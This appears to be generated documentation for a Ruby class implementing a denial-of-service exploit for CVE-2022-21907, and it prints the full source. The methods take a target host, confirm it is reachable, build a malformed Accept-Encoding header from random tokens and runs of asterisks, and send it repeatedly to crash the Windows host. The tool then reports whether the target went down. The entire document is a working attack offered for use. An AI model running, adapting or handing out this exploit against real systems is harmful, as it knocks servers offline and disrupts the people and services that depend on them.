class CVE202221907

This class implements methods to exploit CVE-2022-21907 for a DoS (Denial of Service) attack (Blue Screen) in Ruby.

Public Class Methods

check_up(request, uri)

Checks whether the target is reachable by sending one request. Returns 2 when the connection times out or the host cannot be resolved, nil otherwise.

# File CVE-2022-21907.rb, line 110
def self.check_up(request, uri)
  # The response itself is not needed; only the success or failure of the
  # connection matters here.
  Net::HTTP.start(
    uri.hostname, uri.port,
    read_timeout: 60,
    open_timeout: 60,
    use_ssl: uri.scheme == 'https'
  ) { |http| http.request(request) }
rescue Net::OpenTimeout, Errno::ETIMEDOUT, SocketError
  puts '[!] This host is probably inaccessible'
  2
else
  nil
end
generate_encoding_payload()

Generates the malformed Accept-Encoding header value used by the attack: random uppercase tokens separated by commas, ampersands, runs of asterisks and empty list elements.

# File CVE-2022-21907.rb, line 98
def self.generate_encoding_payload
  "#{generate_random_string(24)},#{generate_random_string(60)}&" \
    "#{generate_random_string(2)}&**" \
    "#{generate_random_string(20)}**#{Array('A'..'Z').sample}," \
    "#{generate_random_string(73)},#{generate_random_string(71)}" \
    ",#{generate_random_string(27)},****************************" \
    "#{generate_random_string(6)}, *, ,"
end
generate_random_string(size)

Generates a random string of size uppercase letters (A-Z).

# File CVE-2022-21907.rb, line 90
def self.generate_random_string(size)
  upper_characters = Array('A'..'Z')
  Array.new(size) { upper_characters.sample }.join
end
get_stdin_host()

Prompts for the target host and reads it from STDIN.

# File CVE-2022-21907.rb, line 82
def self.get_stdin_host
  print 'Host (target): '
  gets.strip
end
main()

The main function to launch the attack. Takes the host from ARGV[0] (or STDIN), verifies it is reachable, then sends up to 10 requests carrying the payload; a timeout is taken to mean the target has gone down. Returns 0 if the target went down, 1 if it stayed up, and 2 if it was unreachable before the attack started. Because the URI is built with http://, use_ssl is always false in practice.

# File CVE-2022-21907.rb, line 127
def self.main
  host = ARGV[0] || get_stdin_host

  uri = URI("http://#{host}")
  request = Net::HTTP::Get.new(uri)

  access_error = check_up(request, uri)
  return access_error if access_error

  request['Accept-Encoding'] = generate_encoding_payload
  vulnerable = false

  10.times do
    Net::HTTP.start(
      uri.hostname, uri.port,
      read_timeout: 10,
      open_timeout: 10,
      use_ssl: uri.scheme == 'https'
    ) { |http| http.request(request) }
  rescue Net::OpenTimeout, Errno::ETIMEDOUT
    vulnerable = true
    break
  end

  if vulnerable
    puts "[+] Target: #{host} is vulnerable and down."
    0
  else
    puts "[-] Target: #{host} is not vulnerable and up."
    1
  end
end